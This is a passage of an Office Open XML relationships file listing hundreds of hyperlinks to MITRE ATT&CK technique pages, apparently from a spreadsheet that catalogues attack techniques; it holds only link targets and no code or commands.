Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/003" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/006" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/002" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/005" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1125" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/002" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/007" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/005" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/001" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/002" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/007" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/003" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/004" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/007" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/003" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/007" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/004" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/001" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/003" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1025" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/003" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/003" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/003" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1135" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1221" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/010" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/001" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/011" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/003" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/004" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/003" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/001" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011/001" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/002" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/003" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/005" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/003" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/012" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/004" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/001" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/002" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/008" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/003" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/001" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1530" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/001" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/004" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/005" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1111" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1119" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/001" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/008" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/007" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/001" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/007" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/004" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/004" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/010" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/004" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/005" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/005" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1012" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/003" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/001" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/002" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/003" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/001" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1622" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/006" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/005" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/009" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/003" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/004" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/012" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/003" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/008" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/003" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/001" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/001" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/004" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/013" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/001" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/008" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/005" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/003" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/005" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/005" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/005" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/004" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/005" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/006" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/003" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1006" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/003" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1621" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/002" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/002" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/001" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/001" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/002" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/003" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1133" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/002" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/009" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1201" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1057" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1620" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/009" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/005" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/002" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1612" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/002" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/002" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205/001" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1220" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/004" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/015" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/001" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/002" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/007" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/006" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/003" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/001" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020/001" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/002" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/006" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/003" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/003" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/002" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/006" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/002" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1480" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/001" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/006" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/005" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/001" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/001" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/002" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1571" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/011" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/003" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/001" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1200" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/005" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/002" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/001" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/004" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/007" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/006" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1528" TargetMode="External"/><Relationship Id="rId543" 